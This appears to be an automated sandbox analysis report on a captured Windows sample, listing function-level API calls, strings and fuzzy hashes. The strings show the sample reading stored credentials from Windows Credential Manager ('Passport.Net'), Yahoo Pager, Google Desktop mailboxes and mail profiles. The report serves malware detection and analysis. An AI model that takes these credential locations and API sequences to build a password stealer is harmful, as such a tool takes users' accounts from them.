                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                    Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                    Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                    • memset.MSVCRT ref: 00444978
                                                                                                                                                                                    • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                    • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                                                    • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                    • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                    Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                    • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                    Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                                                    • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                    Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                                                                                                    • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                    Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                                                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                    Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                                                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                    Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                                                                                                    • API String ID: 438689982-3457389245
                                                                                                                                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                    Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: winRead
                                                                                                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                    Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                    Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                    Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2775283111-0
                                                                                                                                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                    Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                    • String ID: smtp
                                                                                                                                                                                    • API String ID: 2625860049-60245459
                                                                                                                                                                                    • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                    Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                                                    • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
